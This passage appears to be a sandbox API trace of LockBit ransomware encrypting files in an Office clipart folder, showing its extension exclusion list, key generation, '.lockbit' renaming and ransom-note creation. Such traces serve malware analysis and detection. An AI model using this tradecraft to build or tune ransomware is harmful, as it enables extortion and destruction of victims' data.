lpString2=".WMF") returned -1 [0144.394] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.394] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.394] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.394] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.394] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.394] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.394] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.394] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.395] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.395] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.395] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.395] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.395] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.395] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.395] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.395] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.395] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.395] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.395] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.395] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.395] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.395] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.395] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.395] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.395] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.395] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.395] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.395] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.395] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0150861.WMF") returned 1 [0144.395] lstrcmpiW (lpString1="ntldr", lpString2="J0150861.WMF") returned 1 [0144.395] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0150861.WMF") returned 1 [0144.395] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0150861.WMF") returned -1 [0144.395] lstrcmpiW (lpString1="autorun.inf", lpString2="J0150861.WMF") returned -1 [0144.395] lstrcmpiW (lpString1="thumbs.db", lpString2="J0150861.WMF") returned 1 [0144.396] lstrcmpiW (lpString1="iconcache.db", lpString2="J0150861.WMF") returned -1 [0144.396] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.396] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF") returned=".WMF" [0144.396] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.396] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.396] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.396] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.396] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.396] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.396] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.396] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.396] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.396] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.396] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.396] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.396] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.396] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.396] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.396] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.396] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.396] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.396] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.396] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.396] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.396] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.396] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.397] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.397] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.397] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.397] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.397] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.397] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF.lockbit") returned 72 [0144.397] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0150861.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0144.398] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.398] malloc (_Size=0x40068) returned 0x3df0008 [0144.398] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8494) returned 1 [0144.398] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.398] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.398] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0144.399] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.399] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0144.399] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.404] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.404] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.404] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.405] free (_Block=0x1fa2ed8) [0144.405] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0150861.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.405] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.405] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.405] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f4d5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1104, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0151041.WMF", cAlternateFileName="")) returned 1 [0144.406] lstrcmpiW (lpString1=".", lpString2="J0151041.WMF") returned -1 [0144.406] lstrcmpiW (lpString1="..", lpString2="J0151041.WMF") returned -1 [0144.406] PathFindExtensionW (pszPath="J0151041.WMF") returned=".WMF" [0144.406] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.406] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.406] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.406] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.406] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.406] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.406] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.406] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.406] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.406] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.406] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.406] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.406] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.406] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.406] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.406] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.406] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.406] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.406] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.406] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.406] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.406] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.406] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.406] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.406] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.407] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.407] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.407] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.407] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.407] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.407] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.407] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.407] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.407] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.407] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.407] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.407] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.407] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.407] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.407] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.407] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.407] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.407] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.407] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.407] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.407] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.407] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.407] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0151041.WMF") returned 1 [0144.407] lstrcmpiW (lpString1="ntldr", lpString2="J0151041.WMF") returned 1 [0144.407] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0151041.WMF") returned 1 [0144.407] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0151041.WMF") returned -1 [0144.408] lstrcmpiW (lpString1="autorun.inf", lpString2="J0151041.WMF") returned -1 [0144.408] lstrcmpiW (lpString1="thumbs.db", lpString2="J0151041.WMF") returned 1 [0144.408] lstrcmpiW (lpString1="iconcache.db", lpString2="J0151041.WMF") returned -1 [0144.408] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.408] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF") returned=".WMF" [0144.408] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.408] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.408] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.408] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.408] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.408] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.408] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.408] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.408] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.408] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.408] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.408] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.408] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.408] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.408] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.408] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.408] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.408] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.408] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.408] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.408] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.409] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.409] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.409] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.409] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.409] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.409] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.409] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.409] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF.lockbit") returned 72 [0144.409] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151041.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0144.411] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.411] malloc (_Size=0x40068) returned 0x3df0008 [0144.411] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4356) returned 1 [0144.411] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.411] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0144.411] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.412] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0144.412] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0144.419] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.419] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.420] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0144.420] free (_Block=0x1fa2ed8) [0144.420] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151041.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.420] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.421] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.421] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f4d5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3c68, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0151045.WMF", cAlternateFileName="")) returned 1 [0144.421] lstrcmpiW (lpString1=".", lpString2="J0151045.WMF") returned -1 [0144.421] lstrcmpiW (lpString1="..", lpString2="J0151045.WMF") returned -1 [0144.421] PathFindExtensionW (pszPath="J0151045.WMF") returned=".WMF" [0144.421] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.421] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.421] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.421] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.421] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.421] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.421] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.421] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.421] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.421] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.421] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.421] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.421] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.421] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.421] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.422] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.422] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.422] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.422] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.422] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.422] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.422] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.422] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.422] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.422] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.422] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.422] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.422] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.422] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.422] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.422] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.422] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.422] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.422] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.422] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.422] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.422] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.422] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.422] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.422] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.422] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.422] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.423] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.423] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.423] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.423] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.423] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.423] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0151045.WMF") returned 1 [0144.423] lstrcmpiW (lpString1="ntldr", lpString2="J0151045.WMF") returned 1 [0144.423] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0151045.WMF") returned 1 [0144.423] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0151045.WMF") returned -1 [0144.423] lstrcmpiW (lpString1="autorun.inf", lpString2="J0151045.WMF") returned -1 [0144.423] lstrcmpiW (lpString1="thumbs.db", lpString2="J0151045.WMF") returned 1 [0144.423] lstrcmpiW (lpString1="iconcache.db", lpString2="J0151045.WMF") returned -1 [0144.423] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.423] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF") returned=".WMF" [0144.423] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.423] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.423] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.423] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.423] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.423] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.423] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.423] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.423] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.423] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.423] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.424] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.424] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.424] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.424] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.424] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.424] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.424] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.424] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.424] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.424] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.424] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.424] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.424] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.424] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.424] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.424] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.424] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.424] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF.lockbit") returned 72 [0144.424] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151045.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151045.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0144.425] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.425] malloc (_Size=0x40068) returned 0x3df0008 [0144.425] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=15464) returned 1 [0144.425] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.426] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0144.426] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.427] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: 